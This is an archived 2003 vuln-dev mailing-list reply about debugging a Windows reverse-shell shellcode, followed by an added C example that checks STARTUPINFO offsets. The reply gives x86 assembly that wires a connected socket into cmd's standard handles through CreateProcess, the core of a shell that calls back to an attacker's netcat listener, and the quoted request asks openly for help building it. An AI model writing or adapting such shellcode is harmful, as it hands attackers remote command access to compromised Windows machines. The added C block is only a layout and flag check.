Re: Windows reverse Shell
From: sk (sk@scan-associates.net)
Date: 02/04/03
- Previous message: 3APA3A: "Re[2]: Windows reverse Shell"
- In reply to: NetNinja: "Windows reverse Shell"
- Next in thread: Berend-Jan Wever: "Re: Windows reverse Shell"
From: "sk" <sk@scan-associates.net>
To: "SecFocus" <netninja@hotmail.kg>, <vuln-dev@securityfocus.com>
Date: Wed, 5 Feb 2003 00:42:54 +0800
If I remember correctly, that shellcode doesn't have a "bind" function. A reverse
connect shellcode doesn't need "bind". WSASocket() will return a
non-overlapping socket, so it can be used as the in/out/err handler in
CreateProcess(); there is really nothing extra you need to do. Since you got
a connection in your nc, the problem should be in your CreateProcess(). Try
to check if your StartupInfo flags have STARTF_USESTDHANDLES.
I don't have C code for this, but in asm, it could be something like this:
;ebx = socket
xor ecx,ecx
mov cl,11h
push edi
mov edi,ebp
rep stos dword ptr [edi] ;zero up startupinfo
pop edi
mov byte ptr [ebp],44h ;STARTUPINFO size
mov dword ptr [ebp+3Ch],ebx ;output handler
mov dword ptr [ebp+38h],ebx ;input handler
mov dword ptr [ebp+40h],ebx ;error handler
mov word ptr [ebp+2Ch],0101h
;STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW
lea eax,[ebp+44h]
push eax
push ebp
push ecx
push ecx
push ecx
inc ecx
push ecx
dec ecx
push ecx
push ecx
push esi ;"cmd",0
push ecx
call dword ptr [edi-28] ;CreateProcess
sk
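Added example, not sk's code or anything posted in this thread: a host-independent mirror of the 32-bit STARTUPINFOA layout that confirms the offsets the assembly above hard-codes (cb = 0x44, dwFlags at 0x2C, the three std handles at 0x38/0x3C/0x40), plus the STARTF_USESTDHANDLES check sk recommends. The struct, the return codes and the 0x1234 handle value are constructed for illustration; real code would use the Windows headers.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Mirror of the Win32 (32-bit) STARTUPINFOA layout. LPSTR, LPBYTE and HANDLE are
 * all 4 bytes on Win32, so uint32_t stands in for them so the struct can be
 * inspected on any host. Constructed for this example, not from Windows headers. */
typedef struct {
    uint32_t cb;                                      /* 0x00: must equal sizeof */
    uint32_t lpReserved, lpDesktop, lpTitle;
    uint32_t dwX, dwY, dwXSize, dwYSize;
    uint32_t dwXCountChars, dwYCountChars, dwFillAttribute;
    uint32_t dwFlags;                                 /* 0x2C */
    uint16_t wShowWindow;                             /* 0x30 */
    uint16_t cbReserved2;                             /* 0x32 */
    uint32_t lpReserved2;                             /* 0x34 */
    uint32_t hStdInput;                               /* 0x38 */
    uint32_t hStdOutput;                              /* 0x3C */
    uint32_t hStdError;                               /* 0x40 */
} startupinfo32_t;

#define STARTF_USESHOWWINDOW 0x00000001u
#define STARTF_USESTDHANDLES 0x00000100u

/* Layout check: the hard-coded offsets in the asm only work if these hold. */
int layout_matches_post(void) {
    return sizeof(startupinfo32_t) == 0x44
        && offsetof(startupinfo32_t, dwFlags)    == 0x2C
        && offsetof(startupinfo32_t, hStdInput)  == 0x38
        && offsetof(startupinfo32_t, hStdOutput) == 0x3C
        && offsetof(startupinfo32_t, hStdError)  == 0x40;
}

/* The diagnostic sk suggests: why would the child not receive the std handles?
 * 0 = ok, 1 = cb wrong, 2 = STARTF_USESTDHANDLES missing, 3 = a std handle is
 * NULL, 4 = bInheritHandles (a separate CreateProcess argument) not set. */
int check_startupinfo(const startupinfo32_t *si, int inherit_handles) {
    if (si->cb != sizeof(startupinfo32_t)) return 1;
    if (!(si->dwFlags & STARTF_USESTDHANDLES)) return 2;
    if (!si->hStdInput || !si->hStdOutput || !si->hStdError) return 3;
    if (!inherit_handles) return 4;
    return 0;
}

int main(void) {
    startupinfo32_t si = {0};
    si.cb = 0x44;
    si.hStdInput = si.hStdOutput = si.hStdError = 0x1234;   /* constructed value */
    printf("layout ok: %d, without flag: %d\n", layout_matches_post(),
           check_startupinfo(&si, 1));
    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; /* the 0101h word */
    printf("with flag: %d\n", check_startupinfo(&si, 1));
    return 0;
}
```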
----- Original Message -----
From: "NetNinja" <netninja@hotmail.kg>
To: <vuln-dev@securityfocus.com>
Sent: Tuesday, February 04, 2003 3:37 AM
Subject: Windows reverse Shell
> Hello guys,
>
> David Litchfield in his Blackhat talk talked about using the socket handle
> from WSASocket() and passing that handle as a parameter to stdin, stdout
> and stderr for the CreateProcess function. By doing it this way his reverse
> cmd shellcode becomes much smaller. I tried coding that reverse
> command shell in C, but couldn't get it to work. It simply connects to
> my listening netcat listener and then disconnects. David Litchfield
> used 4 functions to achieve that: WSASocket, bind, connect and
> CreateProcess. A little help would be appreciated on building this reverse
> cmd shell. Thanks.
>
>
> --
> Best regards,
> A*** mailto:netninja@hotmail.kg
- Next message: Berend-Jan Wever: "Re: Windows reverse Shell"